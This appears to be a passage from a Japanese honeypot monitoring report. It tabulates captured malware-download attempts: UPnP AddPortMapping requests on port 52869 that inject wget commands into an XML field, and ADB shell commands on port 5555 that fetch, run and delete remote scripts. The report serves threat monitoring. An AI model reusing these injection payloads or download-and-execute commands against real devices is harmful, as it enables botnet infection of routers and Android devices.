調査した結果、SSH関連の通信でした。
ペイロード
SSH-2.0-libssh2_1.7.0..

マルウェア検知>
特に検知傾向に大きな変化はありませんでした。

宛先ポート 送信元IP マルウェアダウンロード ペイロード 検知数
52869 217[.]61[.]3[.]138 hxxp://76[.]74[.]177[.]230/seraph[.]mips POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 636..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/seraph.mips -O seraph`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 27
52869 80[.]211[.]44[.]143 hxxp://107[.]191[.]99[.]230/loli[.]mips POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 26
52869 80[.]211[.]103[.]12 hxxp://107[.]191[.]99[.]230/loli[.]mips POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 18
5555 122[.]96[.]234[.]121 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 6
5555 5[.]27[.]11[.]146 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 4
52869 162[.]243[.]174[.]240 hxxp://178[.]62[.]24[.]222/bins/hoho[.]mips POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 652..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64..Connection: keep-alive..Accept: */*..Accept-Encoding: gzip, deflate.....<?xml version="1.0" ?>.<s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">.<s:Body>.<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">.<NewRemoteHost></NewRemoteHost>.<NewExternalPort>47450</NewExternalPort>.<NewProtocol>TCP</NewProtocol>.<NewInternalPort>44382</NewInternalPort>.<NewInternalClient>`cd /tmp/; wget hxxp://xxx.xxx.xxx.xxx/bins/hoho.mips -O sp`</NewInternalClient>.<NewEnabled>1</NewEnabled>.<NewPortMappingDescription>syncthing</NewPortMappingDescription>.<NewLeaseDuration>0</NewLeaseDuration>.</u:AddPortMapping>.</s:Body>.</s:Envelope>. 4
5555 202[.]62[.]20[.]234 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 2
5555 101[.]206[.]144[.]219 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 105[.]130[.]167[.]144 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 105[.]152[.]251[.]64 hxxp://185[.]162[.]130[.]187/adbs2 CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. 1
5555 106[.]18[.]202[.]32 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 111[.]197[.]142[.]125 hxxp://185[.]162[.]130[.]187/adbs2 CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. 1
5555 112[.]193[.]94[.]196 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 114[.]252[.]221[.]4 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 114[.]254[.]209[.]7 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... 1
5555 114[.]35[.]37[.]242 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 117[.]94[.]148[.]81 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... 1
5555 122[.]230[.]165[.]152 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 122[.]245[.]30[.]160 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 125[.]109[.]119[.]84 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 168[.]70[.]69[.]84 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 176[.]237[.]14[.]168 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 176[.]237[.]49[.]113 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 176[.]237[.]77[.]30 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 177[.]253[.]35[.]177 hxxp://185[.]162[.]130[.]187/adbs2 CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. 1
5555 180[.]122[.]19[.]45 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 185[.]48[.]54[.]25 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 187[.]27[.]181[.]112 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 1[.]214[.]183[.]146 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]16[.]121 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]16[.]128 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]16[.]225 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]16[.]229 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]17[.]136 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]17[.]15 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]17[.]207 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]17[.]36 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]17[.]49 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]17[.]84 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]18[.]167 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]18[.]45 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]18[.]94 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]19[.]145 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]19[.]50 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]19[.]62 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]19[.]74 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]19[.]90 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]20[.]169 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]20[.]231 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]20[.]47 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]20[.]89 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]21[.]108 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]21[.]123 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]21[.]138 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]21[.]162 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]21[.]44 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]21[.]60 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 202[.]62[.]21[.]72 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 203[.]218[.]123[.]114 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 218[.]103[.]129[.]81 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 221[.]124[.]105[.]149 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 223[.]10[.]249[.]244 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 223[.]17[.]33[.]158 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 223[.]17[.]71[.]38 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 24[.]47[.]115[.]152 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 27[.]213[.]109[.]36 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 42[.]2[.]175[.]164 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 42[.]98[.]8[.]69 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... 1
5555 58[.]153[.]243[.]222 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 58[.]254[.]52[.]232 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 5[.]27[.]138[.]218 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... 1
5555 60[.]22[.]177[.]204 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 77[.]217[.]133[.]48 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 78[.]130[.]206[.]137 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 78[.]68[.]59[.]80 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 80[.]178[.]84[.]82 hxxp://207[.]148[.]78[.]152/bc CNXN............2.......host::.OPEN............&A......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;. 1
5555 82[.]222[.]171[.]202 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 83[.]183[.]62[.]208 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 84[.]219[.]223[.]57 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 88[.]129[.]182[.]215 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1
5555 92[.]35[.]169[.]79 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... 1
5555 95[.]9[.]228[.]72 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 1


以上となります。